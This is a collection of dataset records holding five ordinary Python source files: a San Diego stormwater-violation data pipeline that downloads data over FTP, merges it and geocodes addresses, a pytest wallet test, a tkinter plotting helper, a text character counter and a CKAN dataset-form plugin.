{"seq_id":"76698999","text":"\"\"\"_jobs file for tsw_integration.\"\"\"\nimport os\nimport pandas as pd\nimport geopandas as gpd\nimport logging\nimport string\nimport glob\nimport numpy as np\nfrom shapely.geometry import Point\nfrom trident.util import general\nfrom trident.util import geospatial\nfrom trident.util.sf_client import Salesforce\nfrom airflow.hooks.postgres_hook import PostgresHook\nimport cx_Oracle\n\n\nconf = general.config\ncredentials = general.source['dsd_permits']\n\ntemp_file_sf = conf['temp_data_dir'] + '/tsw_violations_sf_temp.csv'\ntemp_file_pts = conf['temp_data_dir'] + '/tsw_violations_pts_temp.csv'\ntemp_file_vpm = conf['temp_data_dir'] + '/tsw_violations_vpm_temp.csv'\nprod_file_geojson = conf['prod_data_dir'] + '/stormwater_violations_merged.geojson'\nprod_file_csv = conf['prod_data_dir'] + '/stormwater_violations_merged.csv'\nprod_file_csv_with_null_geos = conf['prod_data_dir'] + '/stormwater_violations_merged_null_geos.csv'\n\ndump_gz_file = \"sd_sw_daily_dump.tar.gz\"\ndump_sql_file = \"sd_daily_dump.sql\"\n\n## Name of file on FTP that contains 
the extracted CSV of VPM vios.\ndump_csv_file = \"tsw_violations_vpm_temp.csv\"\n\n# Global placeholder for ref file\ngeoref = None\n\ngeocoded_addresses = 'https://datasd-reference.s3.amazonaws.com/sw_viols_address_book.csv'\n\n\n# VPM RETRIEVAL SUPPORT METHODS\n\ndef get_vpm_violations_wget():\n \"\"\"Temporary placeholder method for generating a wget to retrieve violations\"\"\"\n\n command = \"\"\"\n rm -rf {} && wget -np --continue \\\n --user={} --password={} \\\n --directory-prefix={} \\\n ftp://ftp.datasd.org/uploads/virtual_pm/{}\n \"\"\".format(\n temp_file_vpm,\n conf['ftp_datasd_user'],\n conf['ftp_datasd_pass'],\n conf['temp_data_dir'],\n dump_csv_file)\n\n return command\n\n\n\n#def ftp_download_wget():\n# \"\"\"Download sql dump.\"\"\"\n#\n# command = \"\"\"\n# wget -np --continue \\\n# --user={} --password={} \\\n# --directory-prefix={} \\\n# ftp://ftp.datasd.org/uploads/virtual_pm/{}\n# \"\"\".format(conf['ftp_datasd_user'], conf['ftp_datasd_pass'], conf['temp_data_dir'], dump_gz_file)\n#\n# return command\n#\n#\n#def get_tar_command():\n# \"\"\"Extract sql dump.\"\"\"\n# command = \"tar -zxvf {}/{}\".format(conf['temp_data_dir'], dump_gz_file)\n# return command\n#\n#\n#\n#\n#def get_vpm_populate_sql():\n# \"\"\" Populate SQL for VPM by running the unzipped SQL query. \"\"\"\n# query = general.file_to_string(\"{}/{}\".format(conf['temp_data_dir'], dump_sql_file))\n# query = query.decode('UTF-8', errors='ignore')\n# query = query.encode('ascii', errors='ignore')\n# return query\n#\n#\n#\n### For when we have a db to query, hopefully this is how we query it.\n#def get_vpm_violations():\n# \"\"\" Gets violations from temporary mysql db \"\"\"\n# logging.info(\"Retrieving VPM Vios\")\n# pg_hook = PostgresHook(postgres_conn_id='VPM_TEMP')\n# sql = general.file_to_string('./sql/vpm.sql', __file__)\n# df = pg_hook.get_pandas_df(sql)\n# general.pos_write_csv(df, temp_file_vpm, date_format='%Y-%m-%dT%H:%M:%S%z')\n# return \"Successfully wrote {} records for vpm violations file\".format(\n# df.shape[0])\n\n# END VPM RETRIEVAL SUPPORT METHODS\n\n\ndef get_sf_violations():\n \"\"\"Get violations from sf, creates temp file.\"\"\"\n username = conf['dpint_sf_user']\n password = conf['dpint_sf_pass']\n security_token = conf['dpint_sf_token']\n\n report_id = \"00Ot0000000TPXC\"\n\n # Init salesforce client\n sf = Salesforce(username, password, security_token)\n\n # Pull dataframe\n logging.info('Pull report {} from SF'.format(report_id))\n\n df = sf.get_report_df(report_id)\n\n logging.info('Process report {} data.'.format(report_id))\n\n general.pos_write_csv(df, temp_file_sf, date_format='%Y-%m-%dT%H:%M:%S%z')\n\n return \"Successfully wrote {} records for tsw_sf violations file\".format(\n df.shape[0])\n\ndef get_pts_violations():\n \"\"\" Get violations from pts, creates temp file. 
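Note: this builds and returns a wget shell command string (executed by the caller) rather than downloading within Python. 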
\"\"\"\n logging.info('Downloading PTS violations.')\n\n wget_str = \"wget -np --continue \" \\\n + \"--user=$ftp_user \" \\\n + \"--password='$ftp_pass' \" \\\n + \"--directory-prefix=$temp_dir \" \\\n + \"ftp://ftp.datasd.org/uploads/dsd/stormwater/*Panda_Extract_STW_*.csv\"\n tmpl = string.Template(wget_str)\n command = tmpl.substitute(\n ftp_user=conf['ftp_datasd_user'],\n ftp_pass=conf['ftp_datasd_pass'],\n temp_dir=conf['temp_data_dir'])\n\n return command\n\ndef combine_violations():\n \"\"\"Combine violations from 3 different sources.\"\"\"\n\n ptsv = _clean_pts_violations()\n logging.info(\"Read {} violations from PTS\".format(ptsv.shape[0]))\n vpm = _clean_vpm_violations()\n logging.info(\"Read {} violations from VPM\".format(vpm.shape[0]))\n sfv = _clean_sf_violations()\n logging.info(\"Read {} violations from SFV\".format(sfv.shape[0]))\n\n vs = pd.concat([ptsv, sfv, vpm])\n #vs = pd.concat([ptsv, sfv])\n\n vs.ADDITIONAL_1 = vs.ADDITIONAL_1.astype(str)\n vs.ADDITIONAL_2 = vs.ADDITIONAL_2.astype(str)\n vs.ADDITIONAL_1 = vs.ADDITIONAL_1.apply(lambda x: ''.join(e for e in x if e.isalnum()))\n vs.ADDITIONAL_2 = vs.ADDITIONAL_2.apply(lambda x: ''.join(e for e in x if e.isalnum()))\n\n logging.info(\"There are {} total violations\".format(vs.shape[0]))\n\n vs = vs.fillna(value={'ADDRESS': '',})\n vs = vs.fillna(value={'PARCEL_APN': '',})\n\n add_book = pd.read_csv(geocoded_addresses,low_memory=False)\n \n logging.info(f\"Fixing {vs.loc[(vs.ADDRESS == '') | (vs.ADDRESS == 'nan')].shape[0]} missing addresses\")\n\n parcel_addresses = vs.apply(parcel_to_address,axis=1)\n parcel_add_df = pd.DataFrame(parcel_addresses)\n #parcel_addr_cols = [col for col in parcel_add_df.columns if 'addr' in col or 'stre' in col or 'suf' in col]\n logging.info(parcel_add_df.head())\n\n #vs['ADDRESS'] = parcel_addresses\n \n logging.info('Create geo id based on address for merging')\n \n vs['geo_id'] = vs['ADDRESS'].apply(lambda x: x.lower().replace(' ',''))\n \n add_merge = pd.merge(vs,\n add_book,\n how='left',\n left_on='geo_id',\n right_on='geo_id',\n indicator=True\n )\n\n add_merge['LAT'] = add_merge['lat']\n add_merge['LON'] = add_merge['lng']\n\n logging.info('Separating matches from unmatched')\n\n add_matched = add_merge[add_merge['_merge'] == 'both']\n add_unmatched = add_merge[add_merge['_merge'] == 'left_only']\n\n logging.info(\"There are {} non geocoded entries\".format(\n add_unmatched.shape[0]))\n\n if add_unmatched.empty:\n logging.info('Nothing to geocode')\n geocoded_all = add_matched.copy()\n else:\n geocode_dedupe = add_unmatched.copy()\n geocode_dedupe = geocode_dedupe.drop_duplicates(subset=['geo_id'])\n geocoder_results = geocode_dedupe.apply(get_violation_coords, axis=1)\n coords = geocoder_results.apply(pd.Series)\n geocode_dedupe['LAT'] = coords[0]\n geocode_dedupe['LON'] = coords[1]\n\n add_unmatched = add_unmatched.drop(['LAT','LON'],axis=1)\n \n geocoded = pd.merge(add_unmatched,\n geocode_dedupe[['geo_id','LAT','LON']],\n how='left',\n left_on='geo_id',\n right_on='geo_id'\n )\n logging.info(\"Concat addresses matched with address book and addresses geocoded\")\n geocoded_all = pd.concat([add_matched,geocoded],ignore_index=True,sort=False)\n logging.info(\"Adding new geocodes to address book\")\n add_book_adds = geocode_dedupe[['geo_id','LON','LAT']]\n add_book_adds = add_book_adds.rename(columns={'LAT':'lat','LON':'lng'})\n add_book_new = pd.concat([add_book,add_book_adds])\n add_book_new = add_book_new.drop_duplicates(subset=['geo_id'])\n 
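# Persist the merged, deduplicated address book (existing entries plus fresh geocodes) so later runs can reuse them\n 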
add_book_new.to_csv(conf['prod_data_dir']+'/sw_viols_address_book.csv',index=False)\n \n geocoded_all = geocoded_all.drop(['_merge','geo_id','lat','lng'],axis=1)\n\n vs_full = geocoded_all.copy()\n\n # Lock down a separate csv\n vs_geo = geocoded_all[((geocoded_all.LON.notnull()) | (geocoded_all.LAT.notnull()))]\n vs_geo['COORD'] = list(zip(vs_geo.LON, vs_geo.LAT))\n vs_geo['COORD'] = vs_geo.COORD.apply(Point)\n vs_geo = gpd.GeoDataFrame(vs_geo, geometry='COORD')\n\n logging.info(\"Writing GeoJSON File.\")\n if os.path.isfile(prod_file_geojson):\n os.remove(prod_file_geojson)\n\n vs_geo.to_file(prod_file_geojson, driver=\"GeoJSON\")\n\n logging.info(\"Writing CSV File.\")\n vs_geo.to_csv(prod_file_csv)\n vs_full.to_csv(prod_file_csv_with_null_geos)\n\n return \"Successfully Merged and Wrote Files.\"\n\n\ndef _clean_pts_violations():\n \"\"\" Clean data coming in from PTS \"\"\"\n\n filename = conf['temp_data_dir'] + \"/*Panda_Extract_STW_*.csv\"\n list_of_files = glob.glob(filename)\n latest_file = max(list_of_files, key=os.path.getmtime)\n logging.info(f\"Reading in {latest_file}\")\n\n ptsv = pd.read_csv(latest_file,names=['INSP_ID',\n 'ASSESSOR_PARCEL_10',\n 'LATITUDE',\n 'LONGITUDE',\n 'STREET_ADDRESS',\n 'INSP_TYPE_ID',\n 'INSP_TYPE_NM',\n 'INSP_RESULT_ID',\n 'INSP_RESULT_NM',\n 'PERFORMED_END_DT',\n 'PROJ_TITLE',\n 'SCOPE',\n 'LOCATION_NOTE',\n 'CONSTRUCTION_NOTE'\n ],dtype={'LONGITUDE':np.float64,\n 'LATITUDE':np.float64,\n 'PARCEL_APN':str\n })\n\n ptsv['PARCEL_APN'] = ptsv.ASSESSOR_PARCEL_10\n ptsv['LON'] = ptsv.LONGITUDE\n ptsv['LAT'] = ptsv.LATITUDE\n ptsv['SRC'] = 'DSD_PTS'\n ptsv['TYPE'] = ptsv.INSP_TYPE_NM\n ptsv['STATUS'] = ptsv.INSP_RESULT_NM\n ptsv['UUID'] = (ptsv['SRC'] + '_' + ptsv['INSP_ID'].astype(str).str.replace('-', '_')).str.lower()\n ptsv['ADDRESS'] = ptsv['STREET_ADDRESS'].astype(str)\n ptsv['ISSUE_DATE'] = ptsv['PERFORMED_END_DT']\n ptsv['VIOLATOR'] = ptsv['PROJ_TITLE']\n ptsv['ADDITIONAL_1'] = ptsv['SCOPE']\n ptsv['ADDITIONAL_2'] = ptsv['CONSTRUCTION_NOTE']\n ptsv['COMPLY_BY'] = ''\n\n\n ptsv = ptsv[['UUID',\n 'SRC',\n 'TYPE',\n 'STATUS',\n 'ISSUE_DATE',\n 'COMPLY_BY',\n 'PARCEL_APN',\n 'LON',\n 'LAT',\n 'ADDRESS',\n 'VIOLATOR',\n 'ADDITIONAL_1',\n 'ADDITIONAL_2']]\n\n return ptsv\n\ndef _clean_vpm_violations():\n \"\"\" Clean vpm violations \"\"\"\n\n vpm = pd.read_csv(temp_file_vpm)\n\n\n vpm['SRC'] = 'PW_VPM'\n vpm['sw_bmp_report_id'] = vpm['sw_bmp_report_id'].astype(str)\n vpm['project_id'] = vpm['project_id'].astype(str)\n vpm['permit_number'] = vpm.permit_number.astype(str)\n vpm['UUID'] = (vpm['SRC'] + '_' + vpm['sw_bmp_report_id'] + '_' + vpm['project_id']).str.lower()\n vpm['LON'] = np.nan\n vpm['LAT'] = np.nan\n vpm['STATUS'] = vpm['bmpr_state']\n vpm['TYPE'] = vpm.title\n vpm['PARCEL_APN'] = ''\n vpm['ISSUE_DATE'] = vpm['report_date']\n vpm['COMPLY_BY'] = vpm['reinspection_date']\n vpm['ADDRESS'] = vpm.location_street.astype(str)\n vpm['CITY'] = vpm.location_city\n vpm['STATE'] = vpm.location_state\n vpm['ZIP'] = vpm.location_zip\n vpm['VIOLATOR'] = vpm.project_name\n vpm['ADDITIONAL_1'] = vpm.comments\n vpm['ADDITIONAL_2'] = ''\n\n\n vpm = vpm[['UUID',\n 'SRC',\n 'TYPE',\n 'STATUS',\n 'ISSUE_DATE',\n 'COMPLY_BY',\n 'PARCEL_APN',\n 'LON',\n 'LAT',\n 'ADDRESS',\n 'VIOLATOR',\n 'ADDITIONAL_1',\n 'ADDITIONAL_2']]\n\n return vpm\n\n\n\ndef _clean_sf_violations():\n \"\"\" Clean TSW violations from SF \"\"\"\n\n sfv = pd.read_csv(temp_file_sf, dtype={\n 'Site: Street Number': str,\n 'Violation Date Formatted': str,\n 'BMP Compliance Deadline': str,\n 
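# keep the parcel number as a string (dtype str) so pandas does not coerce it to a number\n 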
'Site: Primary Parcel Number': str\n })\n\n sfv.columns = ['V_NUM',\n 'STATUS',\n 'STATUS_1',\n 'V_TYPE',\n 'TYPE',\n 'V_DATE',\n 'BMP_COMP_DEADLINE',\n 'SITE_ID',\n 'PARCEL_APN',\n 'ADDRESS_NUM',\n 'ADDRESS_STREET',\n 'ADDRESS_CITY',\n 'ADDRESS_STATE',\n 'VIOLATOR']\n\n sfv['SRC'] = 'TSW_SF'\n sfv['LON'] = np.nan\n sfv['LAT'] = np.nan\n sfv['STATUS'] = sfv['STATUS']\n sfv['TYPE'] = sfv['V_TYPE'] + ': ' + sfv['TYPE']\n sfv['UUID'] = (sfv['SRC'] + '_' + sfv['V_NUM'].str.replace('-', '_')).str.lower()\n sfv['ADDRESS'] = (sfv['ADDRESS_NUM'] + ' ' + sfv['ADDRESS_STREET']).astype(str)\n sfv['ISSUE_DATE'] = sfv.V_DATE\n sfv['COMPLY_BY'] = sfv.BMP_COMP_DEADLINE\n sfv['ADDITIONAL_1'] = sfv['STATUS_1']\n sfv['ADDITIONAL_2'] = ''\n\n sfv = sfv[['UUID',\n 'SRC',\n 'TYPE',\n 'STATUS',\n 'ISSUE_DATE',\n 'COMPLY_BY',\n 'PARCEL_APN',\n 'LON',\n 'LAT',\n 'ADDRESS',\n 'VIOLATOR',\n 'ADDITIONAL_1',\n 'ADDITIONAL_2']]\n\n return sfv\n\ndef parcel_to_address(x):\n\n if x['ADDRESS'] == '' or x['ADDRESS'] == 'nan':\n\n if x['PARCEL_APN'] != '':\n\n return geospatial.get_address_for_apn(x['PARCEL_APN'])\n\n else:\n\n return ''\n\n else:\n\n return x['ADDRESS']\n\ndef get_violation_coords(x):\n\n if x['ADDRESS'] != '':\n\n if not x['ADDRESS'].startswith('APN:'):\n\n return geospatial.census_address_geocoder(address_line=x['ADDRESS'])\n\n else:\n\n logging.info(\"Could not get address from APN\")\n\n return np.nan, np.nan\n\n else:\n\n logging.info(\"Could not find any address information\")\n\n return np.nan, np.nan","sub_path":"poseidon/dags/tsw_integration/tsw_integration_jobs.py","file_name":"tsw_integration_jobs.py","file_ext":"py","file_size_in_byte":13500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"}
{"seq_id":"495462250","text":"\"\"\"\nThis test runs tests that use a pytest fixture my_wallet\nwith two sets of {earn, spend, expected} values\n\"\"\"\n\nimport pytest\nfrom wallet import Wallet, InsufficientAmount\n\n\n@pytest.fixture\ndef my_wallet():\n '''Returns a Wallet instance with a zero balance'''\n return Wallet()\n\n@pytest.mark.parametrize(\"earned,spent,expected\", [\n (30, 10, 20),\n (20, 2, 18),\n])\ndef test_transactions(my_wallet, earned, spent, expected):\n my_wallet.add_cash(earned)\n my_wallet.spend_cash(spent)\n assert my_wallet.balance == expected","sub_path":"practice/test_wallet_with_fixtures_and_parameterized_test_functions.py","file_name":"test_wallet_with_fixtures_and_parameterized_test_functions.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"}
{"seq_id":"408752242","text":"\"\"\"Plot a matplotlib fig on a tkinter widget win (tkinter.Tk() or tkinter.Frame).\"\"\"\nfrom typing import Optional, Union\nimport tkinter as tk\nimport tkinter.ttk as ttk\nimport matplotlib\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\n\n\ndef tk_plot(\n fig: matplotlib.figure.Figure,\n win: Union[tk.Tk, ttk.Frame] = None,\n title: str = \"\",\n toolbar: bool = True,\n) -> FigureCanvasTkAgg:\n r\"\"\"Plot matplotlib figures in a tkinter.Tk/Frame.\n\n Args:\n fig: matplotlib figure\n win: tkinter.Tk() or tkinter.Frame()\n title: tkinter widget title\n toolbar: if set to True, a toolbar (matplotlib toolbar) is shown\n\n Returns:\n canvas: a FigureCanvasTkAgg, run canvas.draw() to update.\n\n snippets\\tkinter drawfig*.py (PySimpleGUI matplotlib example)\n matplotlib cookbook: Embedding Matplotlib in a Tkinter GUI application\n\n 
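A rough interactive sketch follows (assumes an ipython session with seaborn and numpy available):\n\n 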
matplotlib.use('TkAgg')\n\n import seaborn as sns\n sns.set_theme()\n sns.set_style(\"whitegrid\")\n matplotlib.pyplot.ion() # for testing in ipython\n\n from matplotlib.gridspec import GridSpec\n\n # gs = GridSpec(3, 1)\n # gs = fig.add_gridspec(2, 2)\n # ax = fig.add_subplot(gs[0, :])\n\n import numpy as np\n ax = fig.add_subplot()\n t = np.arange(0, 3, .01)\n ax.plot(t, 2 * np.sin(2 * np.pi * t))\n canvas.draw()\n\n # fig.clf()\n ax.cla()\n ax = fig.add_subplot(gs[0, :])\n ax.plot(np.sin(2 * np.pi * t))\n canvas.draw()\n \"\"\"\n if win is None:\n win = tk.Tk()\n if title:\n win.wm_title(title)\n else:\n win.wm_title(\"Fig in Tk\")\n\n canvas = FigureCanvasTkAgg(fig, win)\n canvas.get_tk_widget().pack(side=\"top\", fill=\"both\", expand=1)\n if toolbar:\n NavigationToolbar2Tk(canvas, win)\n\n tk_plot.win = win\n # tk_plot.win.destroy() to exit\n\n return canvas\n\n\ndef main(root):\n \"\"\"Run.\"\"\"\n win = ttk.Frame(root)\n win.pack()\n\n fig = matplotlib.figure.Figure(figsize=(5, 4), dpi=100)\n\n # canvas = tk_plot(fig)\n # tk_plot.win.destroy() # to kill\n\n canvas = tk_plot(fig, win)\n\n canvas.draw()\n canvas.cla() # to clear the canvas\n\n _ = \"\"\"\n # update fig\n ax1 = fig.add_subplot(211) # gs[,] gs = mpl.gridspec.GridSpec(3,1)\n # ax1.plot(...) or sns.heatmap(ax=ax1), df.plot(..., ax=ax)\n canvas.draw()\n\n # fig.clear() # fig.clf()\n #\n # ax1.cla()\n \"\"\"\n\n\nif __name__ == \"__main__\":\n # in ipython\n # %matplotlib tk\n root = tk.Tk()\n root.wm_title(\"Fig in Tk\")\n\n main(root)\n root.mainloop()\n","sub_path":"smatrix/tk_plot.py","file_name":"tk_plot.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"477013978","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# count.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: eduriez +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2020/03/09 11:00:38 by eduriez #+# #+# #\n# Updated: 2020/03/09 12:01:34 by eduriez ### ########.fr #\n# #\n# **************************************************************************** #\n\nimport string\n\ndef text_analyzer(*text):\n\t\"\"\"\n\tThis function counts the number of upper characters, lower characters,\n\tpunctuation and spaces in a given text.\n\t\"\"\"\n\tnumber_args = len(text)\n\tif number_args < 2:\n\t\tif number_args == 0:\n\t\t\ttext = str(input(\"What is the text to analyze ?\\n<< \"))\n\t\telse:\n\t\t\ttext = text[0]\n\t\tif text == \"\":\n\t\t\tprint(\"empty text.\")\n\t\telse:\n\t\t\tlower_number = 0\n\t\t\tupper_number = 0\n\t\t\tpunctuation_number = 0\n\t\t\tspace_number = 0\n\t\t\tfor current_char in text:\n\t\t\t\tif current_char.islower():\n\t\t\t\t\tlower_number += 1\n\t\t\t\telif current_char.isupper():\n\t\t\t\t\tupper_number += 1\n\t\t\t\telif current_char.isspace():\n\t\t\t\t\tspace_number += 1\n\t\t\t\telif current_char in string.punctuation:\n\t\t\t\t\tpunctuation_number += 1\n\t\t\tprint(f\"\"\"The text contains {len(text)} characters:\n\n- {upper_number} upper letters\n\n- {lower_number} lower letters\n\n- {punctuation_number} punctuation marks\n\n- {space_number} spaces\"\"\")\n\telse:\n\t\tprint(\"ERROR\")\n","sub_path":"bootcamp_python_for_ML/D00/ex03/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"328815256","text":"import re\nimport datetime\nimport json\nimport 
weberror\nimport logging\nimport string\nimport urllib\nimport geoalchemy\nfrom itertools import chain, ifilter\nfrom routes.mapper import SubMapper\n\nimport ckan.model as model\nimport ckan.plugins as p\nimport ckan.plugins.toolkit as toolkit\nimport ckan.logic as logic\n\nimport ckanext.publicamundi.model as ext_model\nimport ckanext.publicamundi.lib.metadata as ext_metadata\nimport ckanext.publicamundi.lib.metadata.validators as ext_validators\nimport ckanext.publicamundi.lib.actions as ext_actions\nimport ckanext.publicamundi.lib.template_helpers as ext_template_helpers\nimport ckanext.publicamundi.lib.pycsw_sync as ext_pycsw_sync\n\nfrom ckanext.publicamundi.lib.util import (to_json, random_name, Breakpoint)\nfrom ckanext.publicamundi.lib.metadata import dataset_types\n\n_ = toolkit._\nasbool = toolkit.asbool\naslist = toolkit.aslist\nurl_for = toolkit.url_for\n\nlog1 = logging.getLogger(__name__)\n\nclass DatasetForm(p.SingletonPlugin, toolkit.DefaultDatasetForm):\n '''Override the default dataset form.\n '''\n \n p.implements(p.ITemplateHelpers)\n p.implements(p.IConfigurable, inherit=True)\n p.implements(p.IConfigurer, inherit=True)\n p.implements(p.IDatasetForm, inherit=True)\n p.implements(p.IRoutes, inherit=True)\n p.implements(p.IActions, inherit=True)\n p.implements(p.IPackageController, inherit=True)\n p.implements(p.IResourceController, inherit=True)\n p.implements(p.IFacets, inherit=True)\n\n _debug = False\n\n _dataset_types = None\n\n ## Define helper methods ## \n\n @classmethod\n def dataset_types(cls):\n '''Provide a dict of supported dataset types'''\n return cls._dataset_types\n\n @classmethod\n def dataset_type_options(cls):\n '''Provide options for dataset-type (needed for selects)'''\n for k, spec in cls._dataset_types.items():\n yield { 'value': k, 'text': spec['title'] }\n\n ## ITemplateHelpers interface ##\n\n def get_helpers(self):\n '''Return a dict of named helper functions (ITemplateHelpers interface).\n These helpers will be available under the 'h' thread-local global object.\n '''\n\n return {\n 'debug': lambda: self._debug,\n 'random_name': random_name,\n 'filtered_list': ext_template_helpers.filtered_list,\n 'dataset_types': self.dataset_types,\n 'dataset_type_options': self.dataset_type_options,\n 'organization_objects': ext_template_helpers.get_organization_objects,\n 'make_metadata_object': ext_metadata.make_metadata_object,\n 'markup_for_field': ext_metadata.markup_for_field,\n 'markup_for_object': ext_metadata.markup_for_object,\n 'markup_for': ext_metadata.markup_for,\n 'resource_ingestion_result': ext_template_helpers.resource_ingestion_result,\n }\n\n ## IConfigurer interface ##\n\n def update_config(self, config):\n '''Configure CKAN (Pylons) environment'''\n\n # Setup static resources\n\n p.toolkit.add_public_directory(config, 'public')\n p.toolkit.add_template_directory(config, 'templates')\n p.toolkit.add_template_directory(config, 'templates_legacy')\n p.toolkit.add_resource('public', 'ckanext-publicamundi')\n \n return\n\n ## IConfigurable interface ##\n\n def configure(self, config):\n '''Pass configuration to plugins and extensions'''\n \n cls = type(self)\n\n # Are we in debug mode?\n\n cls._debug = asbool(config['global_conf']['debug'])\n \n # Set supported dataset types\n\n type_keys = aslist(config['ckanext.publicamundi.dataset_types'])\n cls._dataset_types = { k: spec\n for k, spec in dataset_types.items() if k in type_keys }\n\n # Modify the pattern for valid names for {package, groups, organizations}\n \n if 
asbool(config.get('ckanext.publicamundi.validation.relax_name_pattern')):\n logic.validators.name_match = re.compile('[a-z][a-z0-9~_\\-]*$')\n log1.info('Using pattern for valid names: %r', \n logic.validators.name_match.pattern)\n \n # Setup extension-wide cache manager\n\n from ckanext.publicamundi import cache_manager\n cache_manager.setup(config)\n \n return\n\n ## IRoutes interface ##\n\n def before_map(self, mapper):\n '''Setup routes before CKAN defines core routes.'''\n\n api_controller = 'ckanext.publicamundi.controllers.api:Controller'\n \n with SubMapper(mapper, controller=api_controller) as m:\n \n m.connect(\n '/api/publicamundi/util/resource/mimetype_autocomplete',\n action='resource_mimetype_autocomplete')\n \n m.connect(\n '/api/publicamundi/util/resource/format_autocomplete',\n action='resource_format_autocomplete')\n\n m.connect(\n '/api/publicamundi/vocabularies',\n action='vocabularies_list')\n \n m.connect(\n '/api/publicamundi/vocabularies/{name}',\n action='vocabulary_get')\n \n m.connect(\n '/api/publicamundi/dataset/export/{name_or_id}', \n action='dataset_export')\n \n m.connect(\n '/api/publicamundi/dataset/import', \n action='dataset_import',\n conditions=dict(method=['POST']))\n\n user_controller = 'ckanext.publicamundi.controllers.user:UserController'\n\n with SubMapper(mapper, controller=user_controller) as m:\n \n # Fixme: unneeded parameters to mapper.connect ?\n\n m.connect(\n 'user_dashboard_resources',\n '/dashboard/resources',\n action='show_dashboard_resources')\n \n m.connect(\n 'admin_page_resources', \n '/user/resources',\n action='show_admin_page_resources')\n \n m.connect(\n 'reject_resource',\n '/{parent}/resources/reject/{resource_id}',\n action='reject_resource')\n \n m.connect(\n 'identify_vector_resource', # Fixme: adapt\n '/{parent}/resources/identify_vector/{resource_id}',\n action='identify_resource',\n storer_type='vector')\n \n m.connect(\n 'render_ingestion',\n '/{parent}/resources/ingest/{resource_id}',\n action='render_ingestion_template')\n \n files_controller = 'ckanext.publicamundi.controllers.files:Controller'\n \n with SubMapper(mapper, controller=files_controller) as m:\n \n m.connect(\n '/publicamundi/files/{object_type}/{name_or_id}/download/{filename:.*?}',\n action='download_file')\n \n m.connect(\n '/publicamundi/files/{object_type}', \n action='upload_file',\n conditions=dict(method=['POST']))\n \n package_controller = 'ckanext.publicamundi.controllers.package:Controller'\n\n mapper.connect(\n '/dataset/import_metadata',\n controller=package_controller,\n action='import_metadata')\n \n tests_controller = 'ckanext.publicamundi.controllers.tests:Controller'\n\n mapper.connect(\n 'publicamundi-tests', \n '/testing/publicamundi/{action}/{id}',\n controller=tests_controller)\n \n mapper.connect(\n 'publicamundi-tests', \n '/testing/publicamundi/{action}',\n controller=tests_controller)\n\n return mapper\n\n ## IActions interface ##\n\n def get_actions(self):\n return {\n 'mimetype_autocomplete': ext_actions.autocomplete.mimetype_autocomplete,\n 'dataset_export': ext_actions.package.dataset_export,\n 'dataset_import': ext_actions.package.dataset_import,\n }\n\n ## IDatasetForm interface ##\n\n def is_fallback(self):\n '''\n Return True to register this plugin as the default handler for\n package types not handled by any other IDatasetForm plugin.\n '''\n return True\n\n def package_types(self):\n '''\n This plugin doesn't handle any special package types, it just\n registers itself as the default (above).\n '''\n return []\n\n 
def __modify_package_schema(self, schema):\n '''Define modify schema for both create/update operations.\n '''\n\n check_not_empty = toolkit.get_validator('not_empty')\n ignore_missing = toolkit.get_validator('ignore_missing')\n ignore_empty = toolkit.get_validator('ignore_empty')\n convert_to_extras = toolkit.get_converter('convert_to_extras')\n default_initializer = toolkit.get_validator('default')\n \n # Add dataset-type, the field that distinguishes metadata formats\n\n is_dataset_type = ext_validators.is_dataset_type\n schema['dataset_type'] = [\n default_initializer('ckan'), convert_to_extras, is_dataset_type,\n ]\n \n # Add package field-level validators/converters\n \n # Note We provide a union of fields for all supported schemata.\n # Of course, not all of them will be present in a specific dataset,\n # so any \"required\" constraint cannot be applied here.\n\n get_field_processor = ext_validators.get_field_edit_processor\n \n for dt, dt_spec in self._dataset_types.items():\n flattened_fields = dt_spec.get('class').get_flattened_fields(opts={\n 'serialize-keys': True,\n 'key-prefix': dt_spec.get('key_prefix', dt)\n })\n for field_name, field in flattened_fields.items():\n # Build chain of processors for field\n schema[field_name] = [ \n ignore_missing, get_field_processor(field),\n ]\n \n # Add before/after package-level processors\n\n preprocess_dataset = ext_validators.preprocess_dataset_for_edit\n postprocess_dataset = ext_validators.postprocess_dataset_for_edit\n \n schema['__before'].insert(-1, preprocess_dataset)\n\n if not '__after' in schema:\n schema['__after'] = []\n schema['__after'].append(postprocess_dataset)\n \n # Add or replace resource field-level validators/converters\n\n guess_resource_type = ext_validators.guess_resource_type_if_empty\n\n schema['resources'].update({\n 'resource_type': [\n guess_resource_type, string.lower, unicode],\n 'format': [\n check_not_empty, string.lower, unicode],\n })\n\n # Done, return updated schema\n\n return schema\n\n def create_package_schema(self):\n schema = super(DatasetForm, self).create_package_schema()\n schema = self.__modify_package_schema(schema)\n return schema\n\n def update_package_schema(self):\n schema = super(DatasetForm, self).update_package_schema()\n schema = self.__modify_package_schema(schema)\n return schema\n\n def show_package_schema(self):\n schema = super(DatasetForm, self).show_package_schema()\n\n # Don't show vocab tags mixed in with normal 'free' tags\n # (e.g. 
on dataset pages, or on the search page)\n schema['tags']['__extras'].append(toolkit.get_converter('free_tags_only'))\n \n check_not_empty = toolkit.get_validator('not_empty')\n ignore_missing = toolkit.get_validator('ignore_missing')\n convert_from_extras = toolkit.get_converter('convert_from_extras')\n \n schema['dataset_type'] = [convert_from_extras, check_not_empty]\n \n # Add package field-level converters\n \n get_field_processor = ext_validators.get_field_read_processor\n\n for dt, dt_spec in self._dataset_types.items():\n flattened_fields = dt_spec.get('class').get_flattened_fields(opts={\n 'serialize-keys': True,\n 'key-prefix': dt_spec.get('key_prefix', dt)\n })\n for field_name, field in flattened_fields.items():\n schema[field_name] = [ \n convert_from_extras, ignore_missing, get_field_processor(field)\n ]\n \n # Add before/after package-level processors\n \n preprocess_dataset = ext_validators.preprocess_dataset_for_read\n postprocess_dataset = ext_validators.postprocess_dataset_for_read\n\n schema['__before'].insert(-1, preprocess_dataset)\n \n if not '__after' in schema:\n schema['__after'] = []\n schema['__after'].append(postprocess_dataset)\n \n return schema\n\n 